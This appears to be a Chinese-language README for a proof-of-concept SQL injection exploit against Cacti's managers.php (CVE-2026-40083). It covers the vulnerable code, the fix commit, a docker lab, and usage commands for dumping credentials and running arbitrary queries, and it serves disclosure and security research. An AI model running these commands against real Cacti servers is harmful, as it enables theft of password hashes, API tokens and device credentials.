针对 CVE-2026-40083 的概念验证漏洞利用程序,这是 Cacti managers.php 中的一个 SQL 注入漏洞,允许任何具有 SNMP Manager 权限的已认证用户读取整个 MySQL 数据库,包括用户凭据和密码哈希。
用法:
# Verify injection (time-based)
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin
# Dump specific user credentials
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin --target-id 1
# Extract arbitrary SQL query result
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin --query "SELECT version()"
# Enumerate all users (scan IDs 1-50)
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin --max-id 50
# With Burp proxy
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin --proxy http://127.0.0.1:8080
在 managers.php 中,来自 selected_graphs_array 的用户输入通过 cacti_unserialize() 反序列化,并直接拼接到 SQL 中而未经任何清理:
$selected_items = cacti_unserialize(stripslashes(gnrv('selected_graphs_array')));
if ($selected_items != false) {
// No validation - direct implode into SQL
db_execute('DELETE FROM snmpagent_managers WHERE id IN (' . implode(',', $selected_items) . ')');
}
selected_graphs_array 参数接受一个 PHP 序列化数组。数组元素以逗号拼接后直接注入到 IN 子句中。
POST /managers.php (action=actions, drp_action=1|2|3)
该 SQL 注入漏洞允许具有 SNMP Manager 权限的已认证用户在数据库上执行任意查询。这使攻击者能够读取包含用户数据、设置、设备凭据和 SNMP 团体名的数据表,并提取 bcrypt 哈希和 API 令牌,从而可能导致账户被攻破。此外,该缺陷还允许执行时间延迟命令,通过耗尽并发数据库连接可能导致拒绝服务。
7.2 高危 CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
提交 52032e760 在 implode 之前添加了 array_map('intval', $selected_items),将所有值转换为整数。
docker-compose up -d --build
等待约 30 秒完成初始化。通过 http://localhost:8088 访问 Cacti
默认凭据:admin / admin
# Test exploit
python3 exploit/poc.py --url http://localhost:8088 --user admin --password admin --target-id 1
本工具仅用于教育和研究目的。请仅在你拥有或已获得明确测试许可的系统上使用。作者不对因使用本程序造成的任何滥用或损害负责。
QuimeraX Intelligence 是一个先进的 EASM 和网络威胁情报平台,专注于识别复杂系统中的关键漏洞。该平台主动监控、检测并提醒客户有关安全威胁,确保透明度并快速响应潜在风险。如果发现客户系统存在漏洞,客户会立即收到通知和全面的报告,以便采取保护措施。了解更多
Hakai Security 是一家由安全专业人士创立的网络安全公司,致力于追求技术卓越。我们提供量身定制的安全解决方案,包括高级渗透测试、逼真的红队模拟和安全开发实践,以主动保护客户资产免受不断演变的网络威胁。
Hacking Club 是一个培训平台,你可以通过由我们安全咨询公司的专家创建的实操课程、实验和挑战来学习网络安全知识:从战场直接到你的训练。通过 hacking club 练习本仓库中呈现的漏洞!了解更多